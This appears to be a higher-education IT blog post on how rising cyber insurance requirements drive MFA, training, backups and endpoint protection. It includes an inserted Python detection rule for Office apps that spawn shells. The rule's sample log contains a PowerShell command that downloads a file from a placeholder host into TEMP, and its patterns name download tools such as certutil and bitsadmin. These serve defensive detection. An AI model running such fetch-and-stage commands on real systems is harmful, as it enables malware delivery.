The changing requirements to obtain cyber insurance coverage are becoming a driver to advance the security timeline for many organizations. The risk and impact of ransomware and data breaches are great, and this is rippling through the insurance industry and across higher education.
Why is the landscape changing?
The ability of organizations to obtain cyber insurance has changed substantially over the past 3-4 years. What was a minor line item in a coverage bundle 5 or more years ago is now expensive and offers limited coverage. This is not surprising: data breaches have been steadily increasing for the past decade, and in 2016 there were on average 3 a day. Losses by insurance companies have been growing. 2020 was a rough year for higher education, my sector, with an average breach cost of $3.9 million, so insurance companies were footing most of the bill and taking losses. Ransomware has been a focus of recent years. While the ransoms are typically less than a breach cost (often under $1 million), they have proved costly to insurance companies. Interestingly, insurance companies bring in negotiators to reduce the ransom.
What is the impact to organizations?
After the growing losses hit highs in 2020, insurance companies started increasing their requirements as to what would make an organization insurable. First came the requirements for multi-factor authentication (MFA) on remote access (VPNs, Remote Desktop), and these have now been followed by requirements for MFA on single sign-on (SSO) connected web services. Don’t get me wrong, MFA is a great tool (imperfect, but all technology is imperfect) and getting more organizations to use MFA will increase security. Since the bad actors are looking to phish users to get inside the corporate network, a compromised account provides a logical way to reach more users, and to reach those users with access to valuable data. MFA greatly reduces the chance an account will be compromised. Again, nothing is foolproof. But I’ve seen organizations at different stages of their MFA journey, and this requirement can come quickly; that’s a challenge. MFA is a big organizational change and requires careful change management. I’ll get more into that in a future post.
Cyber security training has become a requirement as well, often multiple times a year now. It should be followed up with phishing simulations to “test” the training. Hopefully most organizations have been doing this at least annually for a few years; such training is often part of annual financial audit requirements. Depending on what service organizations currently subscribe to, they may need to change to meet both of these requirements. I know I did.
With ransomware being a major focus, likely future requirements could include that backups be physically separate from the network. It is typical for ransomware actors to search for backups and encrypt them as well. If you have a good backup, you may not need to pay the ransom.
While MFA will potentially keep bad actors out of email, users can still be tricked into clicking links and downloading files. This is where insurance will start to focus on the endpoint, the computer. Can users install software? Ideally not. Does the organization use next-generation anti-virus and/or endpoint detection and response (EDR) software? This next generation of endpoint protection looks for behaviors on devices and not signatures of known viruses. With the tools available today a bad actor can create a new type of malware without being technical. That is why looking at behaviors is the current trend – an Excel file should not start a shell script that tries to download software.
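The behavioral rule above (an Office document should not be launching a shell that reaches out to download something) is the kind of parent/child process check an EDR evaluates. As an added example, not the author's code and not tied to any particular EDR product, here is a small Python detection rule run over a few constructed process-creation log lines. The key=value log format, the field names (parent, child, cmdline, user) and the sample events are all assumptions made for the example; real Sysmon or EDR telemetry carries the same information under different names.

```python
"""Flag Office applications that spawn shell interpreters, escalating when the
child command line looks like it is fetching something from the network.

Added example for this post (not the author's code). The log format and the
sample events below are constructed for illustration, not real telemetry.
"""
import re
from typing import Optional

# Parents that should essentially never launch a shell interpreter on a workstation.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
# Interpreters whose launch from an Office parent is the behavior the post warns about.
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Command-line fragments suggesting the child is trying to download something.
DOWNLOAD_HINTS = re.compile(
    r"https?://|invoke-webrequest|downloadstring|downloadfile|bitsadmin|certutil\s+-urlcache|\bcurl\s|\bwget\s",
    re.IGNORECASE,
)
# Assumed log line shape: key=value pairs, with the command line in double quotes.
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

# Constructed sample events (assumption: this is not output of any real product).
SAMPLE_LOG = """\
ts=2024-03-01T09:12:01 user=alice parent=EXCEL.EXE child=cmd.exe cmdline="cmd.exe /c powershell -c Invoke-WebRequest http://example.invalid/update.bin -OutFile %TEMP%\\update.bin"
ts=2024-03-01T09:12:05 user=alice parent=EXCEL.EXE child=splwow64.exe cmdline="splwow64.exe 12288"
ts=2024-03-01T09:13:10 user=bob parent=explorer.exe child=powershell.exe cmdline="powershell.exe -File C:\\scripts\\backup.ps1"
ts=2024-03-01T09:14:22 user=carol parent=WINWORD.EXE child=powershell.exe cmdline="powershell.exe -NoProfile -c Get-Date"
"""


def parse_event(line: str) -> dict:
    """Parse one key=value log line into a dict; quoted values lose their quotes."""
    fields = {}
    for key, value in FIELD_RE.findall(line):
        fields[key] = value[1:-1] if value.startswith('"') else value
    return fields


def classify(event: dict) -> Optional[str]:
    """Return 'high' or 'medium' for an Office-to-shell chain, None when the chain is not suspicious.

    Process names are compared case-insensitively because Windows logs them inconsistently.
    """
    parent = event.get("parent", "").lower()
    child = event.get("child", "").lower()
    if parent not in OFFICE_PARENTS or child not in SHELL_CHILDREN:
        return None
    # Office spawning a shell is already worth a look; a download attempt makes it urgent.
    if DOWNLOAD_HINTS.search(event.get("cmdline", "")):
        return "high"
    return "medium"


def scan(log_text: str) -> list:
    """Run every non-empty line through classify(); return (severity, user, cmdline) for each hit."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = parse_event(line)
        severity = classify(event)
        if severity:
            hits.append((severity, event.get("user", "?"), event.get("cmdline", "")))
    return hits


if __name__ == "__main__":
    for severity, user, cmdline in scan(SAMPLE_LOG):
        print(f"[{severity.upper()}] user={user} cmdline={cmdline}")
```

On the sample log this flags alice's Excel-to-cmd-to-PowerShell download chain as high and carol's Word-to-PowerShell launch as medium, while the printer helper spawned by Excel and bob's scheduled backup script started from Explorer pass through. The medium tier is deliberate: legitimate add-ins do occasionally launch scripts, so an analyst wants the hit without it paging anyone at 3 a.m.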
What should we do?
The changing landscape can make long-term security planning a challenge. I think organizations should keep in close contact with their insurers to be aware of what they are seeing in the market and what they anticipate new requirements to be. I think focusing on strategies that center on the user provides the most value, as most ransomware gains entry through human actions. Some of those would be MFA, cyber security training and phishing simulations, improved endpoint protection, and limiting security access on endpoints. Additionally, for years it was quicker for IT organizations to give IT staff broader security access, and now we just can’t do that. We in IT need to have separate accounts with elevated access (our daily work accounts need to be regular users), and we need to grant the least access required for the job. We in IT are still users and are still fallible, so we need to take the extra step, which takes extra time, to protect our organizations.